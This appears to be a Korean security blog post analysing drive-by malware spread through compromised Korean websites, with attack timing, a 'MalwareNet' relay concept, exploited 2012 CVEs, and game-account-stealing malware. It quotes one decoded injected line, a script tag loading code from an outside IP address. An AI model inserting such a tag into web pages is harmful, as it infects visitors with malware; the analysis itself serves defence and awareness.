[니해알] 니들이 해킹을 알어? - 1부

Figure 3. PC방도 가지 않았는데...

자신은 ‘PC방에서 게임한 적이 한 번도 없고 집에서만 게임하는데 계정이 왜 털리나요?’ 라는 의문에 대한 약간의 해답이 될지 모르겠습니다. 

Figure 5. 악성코드 유포시간(금요일 저녁 집중 유포)

현재 우리나라는 전 세계 1, 2위를 다투는 악성코드 온상지 입니다. 매 주말마다 공격은 반복되고 있습니다. 한국에만 집중되는 공격이 있으며 Flash, Internet Explorer, Java, MIDI 취약성으로 공격합니다.

우리나라는 공격자들에 대해 얼마나 알고 있습니까? 적이 어떻게 행동하는지 알아야 그에 대한 대책도 생각할 수 있습니다. 한 번 고민해 보아야 할 문제입니다.

공격자들은 지능적으로 보안 관리자들이 퇴근하는 금요일 저녁 시간부터 공격을 시작하고 관리자들이 출근하기 전인 월요일 새벽에 공격을 중지합니다. 주말의 웹 사이트들은 공격자들의 악성코드 유포 도구로 전락합니다.

Figure 6. Malware Net.

또한 공격자들은 Malware Network로 BotNet을 구성할 필요없이 웹 페이지 접속만으로 간단하게 악성코드를 유포함으로써 효율적인 공격을 하고 있습니다. 이런 유형으로 넣은 이유는 탐지 회피를 위한 목적이 가장 큽니다.

MalwareNet이란 동일한 악성링크가 최소 10개~최대300개 이상의 웹 서비스에 동시에 중계되는 네트워크 입니다. BotNet보다 유포속도가 훨씬 빠르고 비용대비효과 면에서 우수합니다.  MalwareNet에 대한 내용은 Real Status(배포 경로, 전략, 악성코드 확산 극대화)편에서 심층적으로 살펴보겠습니다. 

Figure 7. 드라마 ‘유령’ 성인 동영상에 악성코드 삽입 (출처:SBS)

최근 인기리에 방영되었던 ‘유령’에서처럼 소설을 한 번 써보자면, 공격자들은 DDoS에 악용된 좀비 PC들을 어떻게 확보 하겠습니까? 드라마처럼 성인 동영상 안에 악성코드를 위장하는 형태도 있겠지만 그것은 공격자들에게 귀찮은 방법입니다.

현재는 웹페이지에 접속하는 것만으로도 좀비 PC로 변할 수 있습니다. 공격자들은 좀 더 많은 좀비 PC를 확보하기 위해 효과적인 수단으로써 MalwareNet을 사용하고 있습니다. 

Figure 8. 실제로그 분석을 통한 악성코드 공격 성공률 60%.  

공격자의 로그를 확인해 보면 새벽 3시간 동안의 소규모 사이트(만약 방문자가 많은 사이트라면?) 공격을 통해서라도 3만4천대의 좀비 PC를 확보하는 것을 확인할 수 있습니다. 공격 성공률은 60%에 육박함을 확인할 수 있습니다.

각 방문자의 운영체제, 브라우저, Flash 버전별 공격 및 권한 획득 이후 최종 악성코드를 사용자 PC에 설치합니다. 운영체제 취약성을 이용한 공격은 많이 감소하고 상대적으로 취약점을 찾아내기 쉬운 어플리케이션을 노리는 악성코드들이 증가했습니다.

연예기획사엔터테인먼트 웹페이지 소스에 추가된 형태는 다음과 같습니다.

Figure 9. 연예기획사에 삽입된 악성링크 형태. 

관리자들이 쉽게 알아볼 수 없도록 eval을 사용하여 악성링크를 넣어 두었습니다. eval을 해독하면 <script src=//209.73.152.146/pic/img.js>/script> 입니다. Script 태그를 사용하여 직접적인 공격에 사용하는 악성링크로 연결됩니다.

포함된 악성링크의 구조는 다음과 같습니다.

Figure 10. 연예기획사 악성링크 구조도.

CVE	취약성
CVE-2012-1889	Microsoft XML Core Services Remote Code Execution Vulnerability
CVE-2012-0754	Adobe Flash Player Remote Memory Corruption Vulnerability
CVE-2012-0507	Oracle Java Applet Rhino Script Engine Remote Code Execution
CVE-2012-0003	MIDI Remote Code Execution Vulnerability
CVE-2011-3544	Oracle Java Applet Rhino Script Engine Remote Code Execution

 Figure 11 공격자들이 활용한 취약성. 

특히 6월 3주차부터 공격에 악용된 1889 취약성은 현재까지 MS에서 정식 패치가 배포되지 않고 임시방편으로 XML을 사용하지 않게 변경하는 Fix it만 배포되어 공격 성공률이 90%에 육박했습니다. 

공격자들은 취약성이 공개된 후로 바로 사용하는 지능적인 모습까지 보여줍니다. 7월 11일에 MS에서 패치를 제공하여 악성코드 감염율은 낮아졌지만 유포범위를 확대하고 계속 사용되는 것으로 보아 현재도 유효한 공격입니다.

Figure 12. 악성코드 계정탈취 게임 리스트

연예기획사에서 유포한 악성코드들은 '디아3'를 비롯한 대부분 돈이 되는 국내•외 게임 계정들을 모니터링하고 탈취하는 악성코드입니다. 심지어 OTP까지 공격자들이 모니터링 하고 있습니다. 

이 악성코드는 기본적으로 자신을 보호하기 위해 백신을 종료시킵니다. 또한 분석을 어렵게 하기 위해 안티 리버싱 기능을 포함하고 있습니다. 공격자들의 목적은 금전적 이득입니다. 이들은 중앙일보 메인 홈페이지를 변조한 해커들과는 다른 양상을 띄고 있습니다. 소리 소문없이 금전적인 이득을 취하는 이들이야말로 우리들이 막아야 할 진정한 공격자들이지 않겠습니까? 

9월 1주차부터 신용정보 조회, 아이템 매니아, 아이템 베이 사이트까지 계정 탈취 기능이 추가 되었습니다. 신용정보 조회 사이트에서 자신의 신용정보를 검색하다가는 자신의 개인정보가 노출될 수도 있습니다. 또한 아이템 매니아, 아이템 베이 사이트는 온라인 게임 아이템 거래 사이트입니다. 

게임 계정을 탈취해서 아이템을 판매하던 공격자들이 이제는 게임 계정 탈취 이외에도 게임 아이템 거래 사이트까지 노리고 있습니다. 돈이 되는 곳은 모두가 대상이 되어 있는 상태입니다. 다른 모든 기기와 장비들에서도 금전화가 가능한 순간부터 현재의 공격 수준은 그대로 확장이 될 것입니다. 아직은 때가 안되었을 뿐입니다. 그 때는 머지 않았습니다.

현재 우리나라는 취약한 웹서비스를 통한 대규모 공격이 가능합니다. 만약 공격자들이 게임계정을 탈취하지 않고 국가기관이나 기업을 타겟으로 한 DDoS를 감행한다면 7.7 DDoS 보다 더욱 심각한 상황이 될 것입니다. 

연예기획사 사이트 전체의 보안성이 개선되지 않는다면 악성코드 삽입은 계속될 것이고 인터넷 보안의 모든 부분에서 위험을 줄이기 위해 노력을 강화해야 할 것입니다. 또한 현재 들어있는 악성코드 파일만 삭제한다고 해서 근본적으로 해결될 문제가 아닙니다. 또한 웹사이트에서 악성코드를 유포한다는 것은 이미 해킹을 당해 개인정보 DB탈취나 시스템 장악이 된 이후일 가능성이 큽니다. 

현재 가장 큰 문제인 악성코드를 대량으로 유포하는 시스템을 무너뜨리는 것은 크게 2가지 부분에서 노력해야 합니다. 우선 악성코드 유포에 이용되는 많은 웹 서비스들의 문제점을 개선하는 측면 하나와 대규모 확산 이전에 차단하는 노력이 병행 되어야 가능할 것입니다.

연예기획사에서 취할 수 있는 대책은 공격자가 인위적으로 웹 소스를 변경하지 못하도록 취약성을 제거한다면 이 문제는 매우 명백하게 해결되겠지만 이렇게 될 가능성은 높지 않습니다. 최소한 방문자가 많은 사이트들에게는 법적으로 일정 수준의 보안 강요가 이루어져야 하고 선제적이고 긴급한 대응이 계속 이루어져야 합니다.